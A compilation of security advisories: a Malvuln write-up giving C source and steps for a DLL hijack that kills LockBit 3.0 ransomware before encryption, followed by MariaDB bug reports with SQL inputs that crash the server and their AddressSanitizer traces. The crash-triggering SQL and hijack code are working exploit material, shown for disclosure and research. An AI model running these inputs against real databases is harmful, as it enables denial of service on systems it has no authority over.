Lockbit version 3.0 ransomware looks for and executes DLLs in its current directory. Therefore, we can hijack a DLL, in this case "RstrtMgr.dll", execute our own code, and terminate the malware pre-encryption. The exploit DLL checks if the current directory is "C:\Windows\System32" and if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Ransom Lockbit 3.0 Vulnerability: Code ExecutionDescription: The ransomware apparently now requires a password to execute as noted by "@vxunderground" E.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a". Lockbit looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL in this case "RstrtMgr.dll", execute our own code and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: LockbitType: PE32MD5: 38745539b71cf201bb502437f891d799Vuln ID: MVID-2022-0621Disclosure: 07/04/2022Video PoC URL: https://www.youtube.com/watch?v=tAXrRcsnzjYExploit/PoC:1) Compile the following C code as "RstrtMgr.dll"2) Place the DLL in same directory as Lockbit 3.03) Optional - Hide it: attrib +s +h "RstrtMgr.dll"4) Run Lockbit 3.0 {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a#include "windows.h"//By malvuln - 7/4/2022//Purpose: RCE in Lockbit 3.0 ransomware//MD5: 38745539b71cf201bb502437f891d799//gcc -c RstrtMgr.c -m32//gcc -shared -o RstrtMgr.dll RstrtMgr.o -m32/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Ransom Lockbit 3.0 aka LockShit\nPWNED by Malvuln", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   if(GetCurrentDirectory(MAX_PATH, buf))   if(strcmp("C:\\Windows\\System32", buf) != 0){      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Ransom Lockbit 3.0 MVID-2022-0621 Code Execution

MariaDB v10.7 was discovered to contain an use-after-poison in in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.

CREATE TABLE v0 ( v2 BIGINT , v1 BIGINT ) ENGINE = MEMORY ROW\_FORMAT = COMPRESSED AS SELECT 59218101.000000 AS v3 UNION SELECT FALSE ;

 START TRANSACTION ;

 SELECT instr ( v1 , DES\_ENCRYPT ( 'x' REGEXP 'x' , 'x' ) ) BETWEEN v3 AND -1 FROM v0 ;

 SELECT DISTINCT v2 IN ( COLLATION ( AVG ( 'x' ) ) + -128 , 'x' , 'x' ) FROM v0 WHERE v2 IS NOT NULL ;

 UPDATE v0 SET v2 = v3 + 69 ;

 INSERT INTO v0 ( ) SELECT v1 , v1 FROM v0 ;

\=================================================================

\==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8

WRITE of size 944 at 0x6290000a6080 thread T14

    #0 0x7fb1687ce7b6 in \_\_interceptor\_memset /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799

    #1 0x55c6bfcc41e9 in JOIN::make\_aggr\_tables\_info() /experiment/mariadb-server/sql/sql\_select.cc:3694

    #2 0x55c6bfcf2e71 in JOIN::optimize\_stage2() /experiment/mariadb-server/sql/sql\_select.cc:3225

    #3 0x55c6bfcfcd06 in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2479

    #4 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #5 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #6 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #7 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #8 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #9 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #16 0x7fb167d655e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000a6080 is located 3712 bytes inside of 16400-byte region \[0x6290000a5200,0x6290000a9210)

allocated by thread T14 here:

    #0 0x7fb16884c279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55c6c12fc9a8 in my\_malloc /experiment/mariadb-server/mysys/my\_malloc.c:90

    #2 0x55c6c12e9414 in alloc\_root /experiment/mariadb-server/mysys/my\_alloc.c:332

    #3 0x55c6bfc3d047 in Query\_arena::alloc(unsigned long) /experiment/mariadb-server/sql/sql\_class.h:1206

    #4 0x55c6bfc3d047 in update\_ref\_and\_keys /experiment/mariadb-server/sql/sql\_select.cc:7110

    #5 0x55c6bfce537e in make\_join\_statistics /experiment/mariadb-server/sql/sql\_select.cc:5377

    #6 0x55c6bfcfc73b in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2453

    #7 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #8 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #9 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #10 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #11 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #12 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #13 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #14 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #15 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #16 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #17 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #18 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7fb1687edfa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55c6c09c9ea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55c6c09c9ea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55c6bf83ab3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55c6bf83ab3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55c6bf8467b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55c6bf84736f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55c6bf84aa52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7fb167c8eb24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799 in \_\_interceptor\_memset

Shadow bytes around the buggy address:

  0x0c528000cbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

\=>0x0c528000cc10:\[f7\]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc30: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc40: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc50: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2933067==ABORTING

CVE-2022-32091: [MDEV-26431] MariaDB Server use-after-poison - Jira

MariaDB v10.4 to v10.7 was discovered to contain an use-after-poison in prepare_inplace_add_virtual at /storage/innobase/handler/handler0alter.cc.

CREATE TABLE v0 ( v1 TIME NOT NULL PRIMARY KEY ) ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( lpad ( 'x' , NULL = 32 , 'x' ) ) STORED ;

 SHOW LOCAL STATUS WHERE COALESCE ( 27 , 51 - 39 ) = 'x' ;

 DELETE FROM v0 WHERE 44707452.000000 ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( v1 + v1 ) , DROP COLUMN v0 ;

 SELECT COUNT ( \* ) FROM v0 WHERE v1 = -128 AND v1 = 'x' ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 14:49:19 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:49:19 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:49:19 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:49:19 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:49:19 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:49:26 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:49:26 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:49:26 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:49:26 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:49:26 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 14:49:26 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/19/ib\_buffer\_pool

2021-08-16 14:49:26 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:49:28 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:49:28

2021-08-16 14:49:28 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/19.socket'  port: 10019  Source distribution

\=================================================================

\==2119277==ERROR: AddressSanitizer: use-after-poison on address 0x6190000d6d60 at pc 0x55a3184baacf bp 0x7f47ed829920 sp 0x7f47ed829910

WRITE of size 64 at 0x6190000d6d60 thread T14

    #0 0x55a3184baace in prepare\_inplace\_add\_virtual /experiment/mariadb-server/sql/field.h:1395

    #1 0x55a3184cc1db in prepare\_inplace\_alter\_table\_dict /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:6206

    #2 0x55a3184d9f06 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:8270

    #3 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #4 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #5 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #6 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #7 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #8 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #9 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #10 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #11 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #12 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #13 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #14 0x7f4811fee5e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6190000d6d60 is located 480 bytes inside of 1152-byte region \[0x6190000d6b80,0x6190000d7000)

allocated by thread T14 here:

    #0 0x7f4812ad5279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55a3185c76c0 in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /experiment/mariadb-server/storage/innobase/include/ut0new.h:375

    #2 0x55a3185c76c0 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /experiment/mariadb-server/storage/innobase/mem/mem0mem.cc:277

    #3 0x55a3184da801 in mem\_heap\_create\_func /experiment/mariadb-server/storage/innobase/include/mem0mem.ic:377

    #4 0x55a3184da801 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:7816

    #5 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #6 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #7 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #8 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #9 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7f4812a76fa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55a31827bea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55a31827bea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55a3170ecb3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55a3170ecb3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55a3170f87b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55a3170f936f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55a3170fca52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7f4811f17b24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/field.h:1395 in prepare\_inplace\_add\_virtual

Shadow bytes around the buggy address:

  0x0c3280012d50: f7 f7 fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d80: f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d90: 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00

\=>0x0c3280012da0: 00 00 00 00 00 00 00 00 00 00 00 f7\[f7\]f7 f7 f7

  0x0c3280012db0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dc0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dd0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012de0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012df0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2119277==ABORTING

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

(gdb) (gdb) (gdb) quit

CVE-2022-32081: [MDEV-26420] use-after-poison in Storage - Jira

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Item_args::walk_args.

CREATE TABLE v0 ( v2 INT NOT NULL , v1 BIGINT AS ( CASE 'x' WHEN CURRENT\_USER ( ) THEN v2 END ) ) ;

 SELECT v2 AS v3 FROM v0 WHERE v1 LIKE 'x' ESCAPE 'x' ;

 INSERT INTO v0 VALUES ( -128 , NULL , NULL , NULL , NULL , TO\_DATE ( 'x' , 'x' ) ) ;

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f9fca453850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f9fe9cffc3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x556139072747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55613803a120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f9fe96e9870\]

:0(\_\_GI\_raise)\[0x7f9fe91c8d22\]

:0(\_\_GI\_abort)\[0x7f9fe91b2862\]

libsupc++/vterminate.cc:75(\_\_gnu\_cxx::\_\_verbose\_terminate\_handler())\[0x7f9fe9552802\]

libsupc++/eh\_terminate.cc:48(\_\_cxxabiv1::\_\_terminate(void (\*)()))\[0x7f9fe955ec8a\]

??:0(std::terminate())\[0x7f9fe955ecf7\]

??:0(\_\_cxa\_pure\_virtual)\[0x7f9fe955fa75\]

sql/item.cc:1121(Item::check\_type\_scalar(st\_mysql\_const\_lex\_string const&) const)\[0x5561380a4308\]

sql/item\_func.cc:271(Item\_func::check\_argument\_types\_scalar(unsigned int, unsigned int) const)\[0x5561381e2a5b\]

sql/item\_func.cc:357(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x5561381ce34e\]

sql/item\_cmpfunc.cc:3131(Item\_func\_case::fix\_fields(THD\*, Item\*\*))\[0x556138100700\]

sql/table.cc:3590(fix\_vcol\_expr(THD\*, Virtual\_column\_info\*))\[0x556137be6ee2\]

sql/sql\_base.cc:5429(TABLE::fix\_vcol\_exprs(THD\*))\[0x55613775e1ca\]

sql/sql\_base.cc:5467(lock\_tables(THD\*, TABLE\_LIST\*, unsigned int, unsigned int))\[0x55613775ef93\]

sql/sql\_base.cc:5261(open\_and\_lock\_tables(THD\*, DDL\_options\_st const&, TABLE\_LIST\*, bool, unsigned int, Prelocking\_strategy\*))\[0x556137763800\]

sql/sql\_base.h:397(open\_and\_lock\_tables(THD\*, TABLE\_LIST\*, bool, unsigned int))\[0x556137819ef4\]

sql/sql\_parse.cc:4565(mysql\_execute\_command(THD\*, bool))\[0x5561378d2bb8\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x5561378df5a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x5561378e560c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x5561378ea73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x556137ca5e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x556137ca633d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x556138736c2c\]

pthread\_create.c:0(start\_thread)\[0x7f9fe96df259\]

:0(\_\_GI\_\_\_clone)\[0x7f9fe928a5e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 VALUES ( -128 , NULL , NULL , NULL , NULL , TO\_DATE ( 'x' , 'x' ) )

Connection ID (thread ID): 4

Status: NOT\_KILLED

